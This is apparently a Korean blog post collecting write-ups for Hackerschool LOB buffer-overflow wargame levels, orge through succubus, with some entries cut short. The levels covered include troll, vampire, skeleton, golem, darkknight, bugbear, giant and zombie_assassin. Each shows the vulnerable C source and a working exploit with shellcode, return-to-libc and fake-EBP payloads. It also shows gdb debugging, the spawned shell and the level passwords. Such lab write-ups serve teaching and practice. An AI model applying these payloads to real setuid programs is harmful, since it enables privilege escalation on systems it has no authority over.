M4ndU의 만두만두한 블로그

해커스쿨 LOB [zombie_assassin -> succubus] 풀이입니다.

ID | zombie_assassin

PW | no place to hide

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: zombie_assassin

Password:

[zombie_assassin@localhost zombie_assassin]$ bash2

[zombie_assassin@localhost zombie_assassin]$ ls -l

total 20

-rwsr-sr-x    1 succubus succubus    13782 Mar 30  2010 succubus

-rw-r--r--    1 root     root         1519 Mar 30  2010 succubus.c

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

// the inspector

int check = 0;

void MO(char *cmd)

{

        if(check != 4)

                exit(0);

        printf("welcome to the MO!\n");

        // olleh!

        system(cmd);

}

void YUT(void)

{

        if(check != 3)

                exit(0);

        printf("welcome to the YUT!\n");

        check = 4;

}

void GUL(void)

{

        if(check != 2)

                exit(0);

        printf("welcome to the GUL!\n");

        check = 3;

}

void GYE(void)

{

        if(check != 1)

                exit(0);

        printf("welcome to the GYE!\n");

        check = 2;

}

void DO(void)

{

        printf("welcome to the DO!\n");

        check = 1;

}

main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        // you cannot use library

        if(strchr(argv[1], '\x40')){

                printf("You cannot use library\n");

                exit(0);

        }

        // check address

        addr = (char *)&DO;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with DO\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // stack destroyer

        // 100 : extra space for copied argv[1]

        memset(buffer, 0, 44);

        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser

        // 40 : extra space for memset function

        memset(buffer-3000, 0, 3000-40);

}

dummy[44]+&DO()[4]+&GYE()[4]+&GUL()[4]+&YUT()[4]+&MO()[4]+dummy[4]+&"/bin/sh"[4]+"/bin/sh"

[zombie_assassin@localhost zombie_assassin]$ readelf -s ./succubus |grep FUNC

    1:  80483dc   359 FUNC    GLOBAL  0  UND strchr@GLIBC_2.0 (2)

    2:  80483ec   116 FUNC    WEAK    0  UND __register_frame_info@GLIBC_2.0 (2)

    3:  80483fc    46 FUNC    GLOBAL  0  UND isprint@GLIBC_2.0 (2)

    4:  804840c   670 FUNC    GLOBAL  0  UND system@GLIBC_2.0 (2)

    5:  804841c   162 FUNC    WEAK    0  UND __deregister_frame_info@GLIBC_2.0 (2)

    6:  804842c    30 FUNC    GLOBAL  0  UND memcmp@GLIBC_2.0 (2)

    7:  804843c   261 FUNC    GLOBAL  0  UND __libc_start_main@GLIBC_2.0 (2)

    8:  804844c    41 FUNC    GLOBAL  0  UND printf@GLIBC_2.0 (2)

    9:  804845c   232 FUNC    GLOBAL  0  UND exit@GLIBC_2.0 (2)

   10:  804846c    70 FUNC    GLOBAL  0  UND memset@GLIBC_2.0 (2)

   13:  804847c    34 FUNC    GLOBAL  0  UND strcpy@GLIBC_2.0 (2)

   37:  80484c0     0 FUNC    LOCAL   0   12 __do_global_dtors_aux

   39:  8048508     0 FUNC    LOCAL   0   12 fini_dummy

   41:  8048510     0 FUNC    LOCAL   0   12 frame_dummy

   42:  8048530     0 FUNC    LOCAL   0   12 init_dummy

   47:  8048920     0 FUNC    LOCAL   0   12 __do_global_ctors_aux

   49:  8048944     0 FUNC    LOCAL   0   12 init_dummy

   57:  8048584   416 FUNC    GLOBAL  0   12 dumpcode

   58:  80483dc   359 FUNC    GLOBAL  0  UND strchr@@GLIBC_2.0

   61:  80483ec   116 FUNC    WEAK    0  UND __register_frame_info@@GLIBC_2.0

   62:  80483fc    46 FUNC    GLOBAL  0  UND isprint@@GLIBC_2.0

   64:  804875c    47 FUNC    GLOBAL  0   12 YUT

   65:  804840c   670 FUNC    GLOBAL  0  UND system@@GLIBC_2.0

   66:  80487bc    47 FUNC    GLOBAL  0   12 GYE

   67:  804839c     0 FUNC    GLOBAL  0   10 _init

   68:  804841c   162 FUNC    WEAK    0  UND __deregister_frame_info@@GLIBC_2.0

   69:  80487ec    28 FUNC    GLOBAL  0   12 DO

   72:  804878c    47 FUNC    GLOBAL  0   12 GUL

   73:  804842c    30 FUNC    GLOBAL  0  UND memcmp@@GLIBC_2.0

   75:  8048808   268 FUNC    GLOBAL  0   12 main

   76:  804843c   261 FUNC    GLOBAL  0  UND __libc_start_main@@GLIBC_2.0

   78:  804844c    41 FUNC    GLOBAL  0  UND printf@@GLIBC_2.0

   79:  8048540    66 FUNC    GLOBAL  0   12 printchar

   80:  804894c     0 FUNC    GLOBAL  0   13 _fini

   81:  804845c   232 FUNC    GLOBAL  0  UND exit@@GLIBC_2.0

   85:  804846c    70 FUNC    GLOBAL  0  UND memset@@GLIBC_2.0

   89:  804847c    34 FUNC    GLOBAL  0  UND strcpy@@GLIBC_2.0

   90:  8048724    55 FUNC    GLOBAL  0   12 MO

DO() | 0x080487ec

GYE() | 0x080487bc

GUL() | 0x0804878c

YUT() | 0x0804875c

MO() | 0x08048724

[zombie_assassin@localhost zombie_assassin]$ mkdir tmp

[zombie_assassin@localhost zombie_assassin]$ cp succubus tmp/

[zombie_assassin@localhost zombie_assassin]$ cd tmp/

[zombie_assassin@localhost tmp]$ ./succubus `python -c 'print "D"*44+"\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"D"*4+"SSSS"+"/bin/sh"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD耳?$DDDDSSSS/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

Segmentation fault (core dumped)

[zombie_assassin@localhost tmp]$ gdb -c core -q

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

#0  0x44444444 in ?? ()

(gdb) x/10s $esp

0xbffffa94:      "SSSS/bin/sh"

0xbffffaa0:      "\b\210\004\b\002"

0xbffffaa6:      ""

0xbffffaa7:      ""

0xbffffaa8:      "퀭?234\203\004\bL\211\004\b`?

0xbffffab7:      "@술?220>\001@\002"

0xbffffac2:      ""

0xbffffac3:      ""

0xbffffac4:      "빛옮??

0xbffffacd:      ""

(gdb) x/s 0xbffffa98

0xbffffa98:      "/bin/sh"

[zombie_assassin@localhost tmp]$ cd ..

[zombie_assassin@localhost zombie_assassin]$ ./succubus `python -c 'print "D"*44+"\xec\x87\x04\x08"+"\xbc\x87\x04\x08"+"\x8c\x87\x04\x08"+"\x5c\x87\x04\x08"+"\x24\x87\x04\x08"+"D"*4+"\x98\xfa\xff\xbf"+"/bin/sh"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD耳?$DDDD섨?bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$

bash$ my-pass

euid = 517

here to stay

해커스쿨 LOB [assassin -> zombie_assassin] 풀이입니다.

ID | assassin

PW | pushing me away

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: assassin

Password:

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ ls -l

total 16

-rwsr-sr-x    1 zombie_a zombie_a    12144 Mar 30  2010 zombie_assassin

-rw-r--r--    1 root     root          557 Mar 30  2010 zombie_assassin.c

[assassin@localhost assassin]$ cat zombie_assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - zombie_assassin

        - FEBP

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }

        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }

        // strncpy instead of strcpy!

        strncpy(buffer, argv[1], 48);

        printf("%s\n", buffer);

}

leave (mov esp, ebp; pop ebp;)

ret (pop eip; jmp eip;)

leave (mov esp, ebp; pop ebp;)

ret (pop eip; jmp eip;)

[assassin@localhost assassin]$ export EGG=`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

[assassin@localhost assassin]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[assassin@localhost assassin]$ gcc getenv.c -o getenv

[assassin@localhost assassin]$ ./getenv

ADDR -> 0xbffffe83

[assassin@localhost assassin]$ mkdir tmp

[assassin@localhost assassin]$ cp zombie_assassin tmp/

[assassin@localhost assassin]$ cd tmp/

[assassin@localhost assassin]$ gdb zombie_assassin -q

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

(생략)

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret

[assassin@localhost tmp]$ ./zombie_assassin `python -c 'print "A"*4+"\x83\xfe\xff\xbf"+"A"*32+"\x50\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`

AAAA껥풞AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?욀?

bash$ id

uid=515(assassin) gid=515(assassin) groups=515(assassin)

bash$ exit

exit

[assassin@localhost tmp]$ cd ..

[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*4+"\x83\xfe\xff\xbf"+"A"*32+"\x50\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`

AAAA껥풞AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?욀?

Segmentation fault

[assassin@localhost assassin]$ mkdir h

[assassin@localhost assassin]$ cp zombie_assassin h/

[assassin@localhost assassin]$ cd h/

[assassin@localhost h]$ ./zombie_assassin `python -c 'print "A"*4+"\x83\xfe\xff\xbf"+"A"*32+"\x50\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`

AAAA껥풞AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?욀?

bash$ exit

exit

[assassin@localhost h]$ cd ..6

[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*4+"\x83\xfe\xff\xbf"+"A"*32+"\x50\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`

AAAA껥풞AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?욀?

bash$ my-pass

euid = 516

no place to hide

해커스쿨 LOB [giant -> assassin] 풀이입니다.

ID | giant

PW | one step closer

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: giant

Password:

[giant@localhost giant]$ bash2

[giant@localhost giant]$ ls -l

total 16

-rwsr-sr-x    1 assassin assassin    12222 Mar 30  2010 assassin

-rw-r--r--    1 root     root          587 Mar 30  2010 assassin.c

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }

        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // buffer+sfp hunter

        memset(buffer, 0, 44);

}

leave

ret

ret

[giant@localhost giant]$ gdb -q assassin

(gdb) disas main

Dump of assembler code for function main:

0x8048470 <main>:       push   %ebp

0x8048471 <main+1>:     mov    %esp,%ebp

(생략)

0x804851d <main+173>:   leave

0x804851e <main+174>:   ret

0x804851f <main+175>:   nop

End of assembler dump.

[giant@localhost giant]$ mkdir tmp

[giant@localhost giant]$ cd tmp/

[giant@localhost tmp]$ export EGG=`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

[giant@localhost tmp]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[giant@localhost tmp]$ gcc getenv.c -o getenv

[giant@localhost tmp]$ ./getenv

ADDR -> 0xbffffe99

해커스쿨 LOB [bugbear -> giant] 풀이입니다.

ID | bugbear

PW | new attacker

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: bugbear

Password:

[bugbear@localhost bugbear]$ bash2

[bugbear@localhost bugbear]$ ls -l

total 20

-rwsr-sr-x    1 giant    giant       12933 Mar  9  2010 giant

-rw-r--r--    1 root     root          920 Mar 29  2010 giant.c

[bugbear@localhost bugbear]$ cat giant.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - giant

        - RTL2

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

main(int argc, char *argv[])

{

        char buffer[40];

        FILE *fp;

        char *lib_addr, *execve_offset, *execve_addr;

        char *ret;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        // gain address of execve

        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "(%x)", &lib_addr);

        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "%x", &execve_offset);

        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;

        // end

        memcpy(&ret, &(argv[1][44]), 4);

        if(ret != execve_addr)

        {

                printf("You must use execve!\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[bugbear@localhost bugbear]$ ./giant "`python -c 'print "D"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xfc\xff\xff\xbf"'`"

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDH?

@?@?@廈@??

bash$ my-pass

euid = 514

one step closer

해커스쿨 LOB [darkknight -> bugbear] 풀이입니다.

ID | darkknight

PW | new attacker

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: darkknight

Password:

[darkknight@localhost darkknight]$ bash2

[darkknight@localhost darkknight]$ ls -l

total 16

-rwsr-sr-x    1 bugbear  bugbear     12043 Mar  8  2010 bugbear

-rw-r--r--    1 root     root          385 Mar 29  2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        int i;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] == '\xbf')

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ mkdir tmp

[darkknight@localhost darkknight]$ cp bugbear tmp/

[darkknight@localhost darkknight]$ cd tmp/

[darkknight@localhost tmp]$ gdb bugbear -q

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/tmp/bugbear

Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

[darkknight@localhost tmp]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"argv"+"/bin/sh"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh

Segmentation fault (core dumped)

[darkknight@localhost tmp]$ gdb -c core -q

Core was generated by `./bugbear DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh'.

Program terminated with signal 11, Segmentation fault.

#0  0x63677261 in ?? ()

(gdb) x/10s $esp

0xbffffac4:      "argv/bin/sh"

0xbffffad0:      "\002"

0xbffffad2:      ""

0xbffffad3:      ""

0xbffffad4:      "\200\203\004\b"

0xbffffad9:      ""

0xbffffada:      ""

0xbffffadb:      ""

0xbffffadc:      "?203\004\b0\204\004\b\002"

0xbffffae6:      ""

(gdb) x/s $esp+4

0xbffffac8:      "/bin/sh"

[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"\xc8\xfa\xff\xbf"+"/bin/sh"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argc힐?bin/sh

bash$ my-pass

euid = 513

new divide

해커스쿨 LOB [golem -> darkknight] 풀이입니다.

ID | golem

PW | cup of coffee

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: golem

Password:

[golem@localhost golem]$ bash2

[golem@localhost golem]$ ls -l

total 16

-rwsr-sr-x    1 darkknig darkknig    12053 Mar  2  2010 darkknight

-rw-r--r--    1 root     root          355 Mar 29  2010 darkknight.c

[golem@localhost golem]$ cat darkknight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkknight

        - FPO

*/

#include <stdio.h>

#include <stdlib.h>

void problem_child(char *src)

{

        char buffer[40];

        strncpy(buffer, src, 41);

        printf("%s\n", buffer);

}

main(int argc, char *argv[])

{

        if(argc<2){

                printf("argv error\n");

                exit(0);

        }

        problem_child(argv[1]);

}

[golem@localhost tmp]$ ./darkknight `python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff"*100'`

릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?

                                     ??퓹懶엥?옹   @

Segmentation fault (core dumped)

[golem@localhost tmp]$ gdb -c core -q

Core was generated by `./darkknight 릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?

                                                                         ?'.

Program terminated with signal 11, Segmentation fault.

#0  0xfffeebbf in ?? ()

[golem@localhost golem]$ ./darkknight `python -c 'print "\x90"*15+"\x31\xc0\x50\ x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\ xcd\x80"+"\x4c"*100'`

릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣됀?

                                     ?L?퓹懶엥?옹   @

bash$ my-pass

euid = 512

new attacker

해커스쿨 LOB [skeleton -> golem] 풀이입니다.

ID | skeleton

PW | shellcoder

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: skeleton

Password:

[skeleton@localhost skeleton]$ bash2

[skeleton@localhost skeleton]$ ls -l

total 16

-rwsr-sr-x    1 golem    golem       12199 Mar  2  2010 golem

-rw-r--r--    1 root     root          539 Mar 29  2010 golem.c

[skeleton@localhost skeleton]$ cat golem.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - golem

        - stack destroyer

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

        char buffer[40];

        int i;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // stack destroyer!

        memset(buffer, 0, 44);

        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

해커스쿨 LOB [troll -> vampire] 풀이입니다.

ID | vampire

PW | music world

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: vampire

Password:

[vampire@localhost vampire]$ bash2

[vampire@localhost vampire]$ ls -l

total 20

-rwsr-sr-x    1 skeleton skeleton    12752 Mar  3  2010 skeleton

-rw-r--r--    1 root     root          821 Mar 29  2010 skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

        char buffer[40];

        int i, saved_argc;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }

        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }

        // argc saver

        saved_argc = argc;

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // buffer hunter

        memset(buffer, 0, 40);

        // ultra argv hunter!

        for(i=0; i<saved_argc; i++)

                memset(argv[i], 0, strlen(argv[i]));

}

[vampire@localhost vampire]$ mkdir tmp

[vampire@localhost vampire]$ cp skeleton tmp/

[vampire@localhost vampire]$ cd tmp/

[vampire@localhost tmp]$ ./skeleton `python -c 'print "A"*47+"\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?

Segmentation fault (core dumped)

[vampire@localhost tmp]$ gdb -c core -q

Core was generated by `                                                           '.

Program terminated with signal 11, Segmentation fault.

#0  0xbf414141 in ?? ()

(gdb) x/1000s 0xbfffff00

[vampire@localhost tmp]$  rename skeleton `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` skeleton

해커스쿨 LOB [troll -> vampire] 풀이입니다.

ID | troll

PW | aspirin

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: troll

Password:

[troll@localhost troll]$ bash2

[troll@localhost troll]$ ls -l

total 16

-rwsr-sr-x    1 vampire  vampire     12103 Mar  2  2010 vampire

-rw-r--r--    1 root     root          550 Mar 29  2010 vampire.c

[troll@localhost troll]$ cat vampire.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - vampire

        - check 0xbfff

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }

        // here is changed!

        if(argv[1][46] == '\xff')

        {

                printf("but it's not forever\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[troll@localhost troll]$ ./vampire `python -c 'print "D"*44+"\x60\x76\xfe\xbf"+" "+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD`v

bash$ my-pass

euid = 509

music world

해커스쿨 LOB [orge -> troll] 풀이입니다.

ID | orge

PW | timewalker

으로 로그인합니다.

\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.

그리고

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,

를 이용해 소스코드를 확인합시다.

login: orge

Password:

[orge@localhost orge]$ bash2

[orge@localhost orge]$ ls -l

total 20

-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll

-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c

[orge@localhost orge]$ cat troll.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - troll

        - check argc + argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

        char buffer[40];

        int i;

        // here is changed

        if(argc != 2){

                printf("argc must be two!\n");

                exit(0);

        }

        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }

        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // buffer hunter

        memset(buffer, 0, 40);

        // one more!

        memset(argv[1], 0, strlen(argv[1]));

}

        // here is changed

        if(argc != 2){

                printf("argc must be two!\n");

                exit(0);

        }

        // one more!

        memset(argv[1], 0, strlen(argv[1]));

[orge@localhost orge]$ rename troll `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` troll

[orge@localhost orge]$ mkdir tmp

[orge@localhost orge]$ cp `python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` tmp

[orge@localhost orge]$ cd tmp

[orge@localhost tmp]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\xff\xff\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?

Segmentation fault (core dumped)

[orge@localhost tmp]$ gdb -c core -q

Core was generated by `./릱릱릱릱릱릱릱릱릱릱?12€l€?楕凹2핽i00tii0cjo듾QT듼슧

?        '.

Program terminated with signal 11, Segmentation fault.

#0  0xbfffffff in ?? ()

(gdb) x/1000x $esp

0xbffffa40:     0x00000000      0xbffffa84      0xbffffa90      0x40013868

0xbffffa50:     0x00000002      0x08048450      0x00000000      0x08048471

(생략)

0xbffffb70:     0x00000000      0x00000000      0x36383669      0x902f2e00

0xbffffb80:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffb90:     0xeb909090      0xc9315e11      0x6c8032b1      0x8001ff0e

0xbffffba0:     0xf67501e9      0xeae805eb      0x32ffffff      0x306951c1

0xbffffbb0:     0x69697430      0x6f6a6330      0x5451e48a      0xb19ae28a

0xbffffbc0:     0x0081ce0c      0x00000000      0x00000000      0x00000000

[orge@localhost orge]$ ./`python -c 'print "\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+" "+"D"*44+"\x80\xfb\xff\xbf"'`

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD€??

bash$ my-pass

euid = 508

aspirin